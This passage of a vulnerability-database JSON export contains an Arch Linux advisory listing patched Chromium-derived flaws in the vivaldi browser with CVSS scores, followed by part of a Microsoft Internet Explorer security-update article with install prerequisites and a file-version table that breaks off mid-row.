"CVE-2021-30552", "CVE-2021-30553"], "modified": "2021-06-22T00:00:00", "id": "ASA-202106-45", "href": "https://security.archlinux.org/ASA-202106-45", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T16:45:45", "description": "Arch Linux Security Advisory ASA-202103-19\n==========================================\n\nSeverity: High\nDate : 2021-03-25\nCVE-ID : CVE-2020-27844 CVE-2021-21159 CVE-2021-21160 CVE-2021-21161\nCVE-2021-21162 CVE-2021-21163 CVE-2021-21165 CVE-2021-21166\nCVE-2021-21167 CVE-2021-21168 CVE-2021-21169 CVE-2021-21170\nCVE-2021-21171 CVE-2021-21172 CVE-2021-21173 CVE-2021-21174\nCVE-2021-21175 CVE-2021-21176 CVE-2021-21177 CVE-2021-21178\nCVE-2021-21179 CVE-2021-21180 CVE-2021-21181 CVE-2021-21182\nCVE-2021-21183 CVE-2021-21184 CVE-2021-21185 CVE-2021-21186\nCVE-2021-21187 CVE-2021-21188 CVE-2021-21189 CVE-2021-21190\nCVE-2021-21191 CVE-2021-21192 CVE-2021-21193\nPackage : vivaldi\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1633\n\nSummary\n=======\n\nThe package vivaldi before version 3.7.2218.45-1 is vulnerable to\nmultiple issues including arbitrary code execution, insufficient\nvalidation, access restriction bypass, content spoofing, incorrect\ncalculation and information disclosure.\n\nResolution\n==========\n\nUpgrade to 3.7.2218.45-1.\n\n# pacman -Syu \"vivaldi>=3.7.2218.45-1\"\n\nThe problems have been fixed upstream in version 3.7.2218.45.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2020-27844 (arbitrary code execution)\n\nA heap-based buffer overflow was discovered in lib/openjp2/t2.c:973 in\nthe current master (commit 18b1138fbe3bb0ae4aa2bf1369f9430a8ec6fa00) of\nOpenJPEG.\n\n- CVE-2021-21159 (arbitrary code execution)\n\nA heap buffer overflow security issue was found in the TabStrip\ncomponent of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21160 (arbitrary code execution)\n\nA heap buffer overflow security issue was found in the WebAudio\ncomponent of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21161 (arbitrary code execution)\n\nA heap buffer overflow security issue was found in the TabStrip\ncomponent of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21162 (arbitrary code execution)\n\nA use after free security issue was found in the WebRTC component of\nthe Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21163 (insufficient validation)\n\nAn insufficient data validation security issue was found in the Reader\nMode component of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21165 (arbitrary code execution)\n\nAn object lifecycle security issue was found in the audio component of\nthe Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21166 (arbitrary code execution)\n\nAn object lifecycle security issue was found in the audio component of\nthe Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21167 (arbitrary code execution)\n\nA use after free security issue was found in the bookmarks component of\nthe Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21168 (access restriction bypass)\n\nAn insufficient policy enforcement security issue was found in the\nappcache component of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21169 (information disclosure)\n\nAn out of bounds memory access security issue was found in the V8\ncomponent of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21170 (content spoofing)\n\nAn incorrect security UI security issue was found in the Loader\ncomponent of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21171 (content spoofing)\n\nAn incorrect security UI security issue was found in the TabStrip and\nNavigation components of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21172 (access restriction bypass)\n\nAn insufficient policy enforcement security issue was found in the File\nSystem API component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21173 (information disclosure)\n\nA side-channel information leakage security issue was found in the\nNetwork Internals component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21174 (incorrect calculation)\n\nAn inappropriate implementation security issue was found in the\nReferrer component of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21175 (incorrect calculation)\n\nAn inappropriate implementation security issue was found in the Site\nisolation component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21176 (incorrect calculation)\n\nAn inappropriate implementation security issue was found in the full\nscreen mode component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21177 (access restriction bypass)\n\nAn insufficient policy enforcement security issue was found in the\nAutofill component of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21178 (incorrect calculation)\n\nAn inappropriate implementation security issue was found in the\nCompositing component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21179 (arbitrary code execution)\n\nA use after free security issue was found in the Network Internals\ncomponent of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21180 (arbitrary code execution)\n\nA use after free security issue was found in the tab search component\nof the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21181 (information disclosure)\n\nA side-channel information leakage security issue was found in the\nautofill component of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21182 (access restriction bypass)\n\nAn insufficient policy enforcement security issue was found in the\nnavigations component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21183 (incorrect calculation)\n\nAn inappropriate implementation security issue was found in the\nperformance APIs component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21184 (incorrect calculation)\n\nAn inappropriate implementation security issue was found in the\nperformance APIs component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21185 (access restriction bypass)\n\nAn insufficient policy enforcement security issue was found in the\nextensions component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21186 (access restriction bypass)\n\nAn insufficient policy enforcement security issue was found in the QR\nscanning component of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21187 (insufficient validation)\n\nAn insufficient data validation security issue was found in the URL\nformatting component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21188 (arbitrary code execution)\n\nA use after free security issue was found in the Blink component of the\nChromium browser before version 89.0.4389.72.\n\n- CVE-2021-21189 (access restriction bypass)\n\nAn insufficient policy enforcement security issue was found in the\npayments component of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21190 (arbitrary code execution)\n\nAn uninitialized use security issue was found in the PDFium component\nof the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21191 (arbitrary code execution)\n\nA use after free security issue was found in the WebRTC component of\nthe Chromium browser before version 89.0.4389.90.\n\n- CVE-2021-21192 (arbitrary code execution)\n\nA heap buffer overflow security issue was found in the tab groups\ncomponent of the Chromium browser before version 89.0.4389.90.\n\n- CVE-2021-21193 (arbitrary code execution)\n\nA use after free security issue was found in the Blink component of the\nChromium browser before version 89.0.4389.90. Google is aware of\nreports that an exploit for this issue exists in the wild.\n\nImpact\n======\n\nA remote attacker might be able to bypass security measures, trick the\nuser into performing unwanted actions or execute arbitrary code.\n\nReferences\n==========\n\nhttps://vivaldi.com/blog/desktop/minor-update-2-for-vivaldi-desktop-3-6/\nhttps://vivaldi.com/blog/vivaldi-fires-up-performance-2/\nhttps://github.com/uclouvain/openjpeg/issues/1299\nhttps://github.com/uclouvain/openjpeg/pull/1301\nhttps://github.com/uclouvain/openjpeg/commit/73fdf28342e4594019af26eb6a347a34eceb6296\nhttps://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop.html\nhttps://crbug.com/1171049\nhttps://crbug.com/1170531\nhttps://crbug.com/1173702\nhttps://crbug.com/1172054\nhttps://crbug.com/1111239\nhttps://crbug.com/1174582\nhttps://crbug.com/1177465\nhttps://crbug.com/1161144\nhttps://crbug.com/1152226\nhttps://crbug.com/1166138\nhttps://crbug.com/1111646\nhttps://crbug.com/1152894\nhttps://crbug.com/1150810\nhttps://crbug.com/1154250\nhttps://crbug.com/1158010\nhttps://crbug.com/1146651\nhttps://crbug.com/1170584\nhttps://crbug.com/1173879\nhttps://crbug.com/1174186\nhttps://crbug.com/1174943\nhttps://crbug.com/1175507\nhttps://crbug.com/1182767\nhttps://crbug.com/1049265\nhttps://crbug.com/1105875\nhttps://crbug.com/1131929\nhttps://crbug.com/1100748\nhttps://crbug.com/1153445\nhttps://crbug.com/1155516\nhttps://crbug.com/1161739\nhttps://crbug.com/1165392\nhttps://crbug.com/1166091\nhttps://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop_12.html\nhttps://crbug.com/1167357\nhttps://crbug.com/1181387\nhttps://crbug.com/1186287\nhttps://security.archlinux.org/CVE-2020-27844\nhttps://security.archlinux.org/CVE-2021-21159\nhttps://security.archlinux.org/CVE-2021-21160\nhttps://security.archlinux.org/CVE-2021-21161\nhttps://security.archlinux.org/CVE-2021-21162\nhttps://security.archlinux.org/CVE-2021-21163\nhttps://security.archlinux.org/CVE-2021-21165\nhttps://security.archlinux.org/CVE-2021-21166\nhttps://security.archlinux.org/CVE-2021-21167\nhttps://security.archlinux.org/CVE-2021-21168\nhttps://security.archlinux.org/CVE-2021-21169\nhttps://security.archlinux.org/CVE-2021-21170\nhttps://security.archlinux.org/CVE-2021-21171\nhttps://security.archlinux.org/CVE-2021-21172\nhttps://security.archlinux.org/CVE-2021-21173\nhttps://security.archlinux.org/CVE-2021-21174\nhttps://security.archlinux.org/CVE-2021-21175\nhttps://security.archlinux.org/CVE-2021-21176\nhttps://security.archlinux.org/CVE-2021-21177\nhttps://security.archlinux.org/CVE-2021-21178\nhttps://security.archlinux.org/CVE-2021-21179\nhttps://security.archlinux.org/CVE-2021-21180\nhttps://security.archlinux.org/CVE-2021-21181\nhttps://security.archlinux.org/CVE-2021-21182\nhttps://security.archlinux.org/CVE-2021-21183\nhttps://security.archlinux.org/CVE-2021-21184\nhttps://security.archlinux.org/CVE-2021-21185\nhttps://security.archlinux.org/CVE-2021-21186\nhttps://security.archlinux.org/CVE-2021-21187\nhttps://security.archlinux.org/CVE-2021-21188\nhttps://security.archlinux.org/CVE-2021-21189\nhttps://security.archlinux.org/CVE-2021-21190\nhttps://security.archlinux.org/CVE-2021-21191\nhttps://security.archlinux.org/CVE-2021-21192\nhttps://security.archlinux.org/CVE-2021-21193", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-25T00:00:00", "type": "archlinux", "title": "[ASA-202103-19] vivaldi: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "baseScore": 8.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 8.5, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27844", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190", "CVE-2021-21191", "CVE-2021-21192", "CVE-2021-21193"], "modified": "2021-03-25T00:00:00", "id": "ASA-202103-19", "href": "https://security.archlinux.org/ASA-202103-19", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}], "mskb": [{"lastseen": "2023-11-28T09:54:23", "description": "None\nThis article applies to the following:\n\n * Internet Explorer 11 on Windows Server 2012 R2\n * Internet Explorer 11 on Windows 8.1\n * Internet Explorer 11 on Windows Server 2012\n * Internet Explorer 11 on Windows Server 2008 R2 SP1\n * Internet Explorer 11 on Windows 7 SP1\n * Internet Explorer 9 on Windows Server 2008 SP2\n\n**Important: **\n\n * As of February 11, 2020, Internet Explorer 10 is no longer in support. To get Internet Explorer 11 for Windows Server 2012 or Windows 8 Embedded Standard, see [KB4492872](<https://support.microsoft.com/help/4492872>). Install one of the following applicable updates to stay updated with the latest security fixes:\n * Cumulative Update for Internet Explorer 11 for Windows Server 2012.\n * Cumulative Update for Internet Explorer 11 for Windows 8 Embedded Standard.\n * The June 2021 Monthly Rollup.\n * Some customers using Windows Server 2008 R2 SP1 who activated their ESU multiple activation key (MAK) add-on before installing the January 14, 2020 updates might need to re-activate their key. Re-activation on affected devices should only be required once. For information on activation, see this [blog](<https://aka.ms/Windows7ESU>) post.\n * WSUS scan cab files will continue to be available for Windows 7 SP1 and Windows Server 2008 R2 SP1. If you have a subset of devices running these operating systems without ESU, they might show as non-compliant in your patch management and compliance toolsets.\n\n## **Summary**\n\nThis security update resolves vulnerabilities in Internet Explorer. To learn more about these vulnerabilities, see [Microsoft Common Vulnerabilities and Exposures](<https://portal.msrc.microsoft.com/en-us/security-guidance>).Additionally, see the following articles for more information about cumulative updates:\n\n * [Windows Server 2008 SP2 update history](<https://support.microsoft.com/help/4343218>)\n * [Windows 7 SP1 and Windows Server 2008 R2 SP1 update history](<https://support.microsoft.com/help/4009469>)\n * [Windows Server 2012 update history](<https://support.microsoft.com/help/4009471>)\n * [Windows 8.1 and Windows Server 2012 R2 update history](<https://support.microsoft.com/help/4009470>)\n\n**Important: **\n\n * The fixes that are included in this update are also included in the June 2021 Security Monthly Quality Rollup. Installing either this update or the Security Monthly Quality Rollup installs the same fixes.\n * This update is not applicable for installation on a device on which the Security Monthly Quality Rollup from June 2021 (or a later month) is already installed. This is because that update contains all the same fixes that are included in this update.\n * If you use update management processes other than Windows Update and you automatically approve all security update classifications for deployment, this update, the June 2021 Security Only Quality Update, and the June 2021 Security Monthly Quality Rollup are deployed. We recommend that you review your update deployment rules to make sure that the desired updates are deployed.\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/library/hh825699>).\n\n## **Known issues in this security update**\n\nWe are currently not aware of any issues in this update.\n\n## **How to get and install this update**\n\n**Before installing this update**To install Windows 7 SP1, Windows Server 2008 R2 SP1, or Windows Server 2008 SP2 updates released on or after July 2019, you must have the following required updates installed. If you use Windows Update, these required updates will be offered automatically as needed.\n\n * Install the SHA-2 code signing support updates: \n \nFor Windows 7 SP1, Windows Server 2008 R2, and Windows Server 2008 SP2, you must have the SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) that is dated September 23, 2019 or a later SHA-2 update installed and then restart your device before you apply this update. For more information about SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>). \n \nFor Windows 7 SP1 and Windows Server 2008 R2 SP1, you must have installed the servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)) that is dated March 12, 2019. After update [KB4490628](<https://support.microsoft.com/help/4490628>) is installed, we recommend that you install the December 8, 2020 SSU ([KB4592510](<https://support.microsoft.com/help/4592510>)) or a later SSU update. For more information about the latest SSU updates, see [ADV990001 | Latest Servicing Stack Updates](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV990001>). \n \nFor Windows Server 2008 SP2, you must have installed the servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)) that is dated April 9, 2019. After update [KB4493730](<https://support.microsoft.com/help/4493730>) is installed, we recommend that you install the October 13, 2020 SSU ([KB4580971](<https://support.microsoft.com/help/4580971>)) or a later SSU update. For more information about the latest SSU updates, see [ADV990001 | Latest Servicing Stack Updates](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV990001>).\n * Install the Extended Security Update (ESU): \n \nFor Windows 7 SP1 and Windows Server 2008 R2 SP1, you must have installed the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/en/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). \n \nFor Windows 7 SP1, Windows Server 2008 R2 SP1, and Windows Server 2008 SP2, you must have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems and follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. Extended support ends as follows:\n * For Windows 7 SP1, Windows Server 2008 R2 SP1, and Windows Server 2008 SP2, extended support ends on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ends on October 13, 2020.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>). \n \nFor Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services. \n \nFor Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.\n\n**Important: **You must restart your device after you install these required updates.\n\n**Install this update**To install this update, use one of the following release channels.**Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other following options. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://support.microsoft.com/help/5003636>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically synchronize with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2, Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Server 2012, Windows Embedded 8 Standard, Windows 8.1, Windows Server 2012 R2**Classification**: Security Updates \n \n## **File information**\n\nThe English (United States) version of this software update installs files that have the attributes that are listed in the following tables.**Note** The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.\n\n### Windows 8.1, Windows RT 8.1 and Windows Server 2012 R2\n\n### \n\n__\n\nInternet Explorer 11 on all supported x86-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nactxprxy.dll| 6.3.9600.20038| 17-May-2021| 21:41| 1,049,600 \nhlink.dll| 6.3.9600.19101| 18-Jul-2018| 20:55| 99,328 \npngfilt.dll| 11.0.9600.19963| 12-Feb-2021| 18:49| 58,368 \nurlmon.dll| 11.0.9600.20038| 17-May-2021| 21:35| 1,341,952 \niexplore.exe| 11.0.9600.19036| 24-May-2018| 22:24| 817,296 \nWininetPlugin.dll| 6.3.9600.17416| 30-Oct-2014| 20:12| 35,328 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 46,592 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 56,320 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 57,856 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 11:17| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 47,616 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 49,152 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 55,296 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 45,056 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 39,424 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 35,840 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 53,760 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:29| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:29| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 52,736 \nwininet.dll.mui| 11.0.9600.20038| 17-May-2021| 23:58| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:27| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 31,232 \nhtml.iec| 2019.0.0.18895| 1-Jan-2018| 20:51| 341,504 \ninetcpl.cpl| 11.0.9600.20038| 17-May-2021| 21:50| 2,058,752 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 307,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 293,888 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 290,304 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 299,008 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 303,104 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 20:58| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 283,648 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 291,840 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 299,520 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 275,968 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 293,376 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 258,048 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 256,512 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 288,256 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 285,184 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 297,472 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 290,816 \nmshtml.dll.mui| 11.0.9600.20038| 17-May-2021| 23:58| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 286,208 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 281,600 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 286,720 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:42| 292,352 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 242,176 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 243,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 243,200 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 73,728 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:35| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 78,848 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 15-Aug-2014| 19:47| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 74,752 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:32| 62,464 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 75,264 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:29| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 73,216 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 41,472 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 37,888 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 70,656 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 69,632 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:39| 68,608 \nF12Resources.dll.mui| 11.0.9600.20038| 17-May-2021| 23:58| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 59,904 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 69,120 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:39| 29,696 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 30,720 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 30,720 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:25| 60,416 \nDiagnosticsHub.ScriptedSandboxPlugin.dll| 11.0.9600.19963| 12-Feb-2021| 18:26| 230,912 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:26| 46,080 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 51,712 \nurlmon.dll.mui| 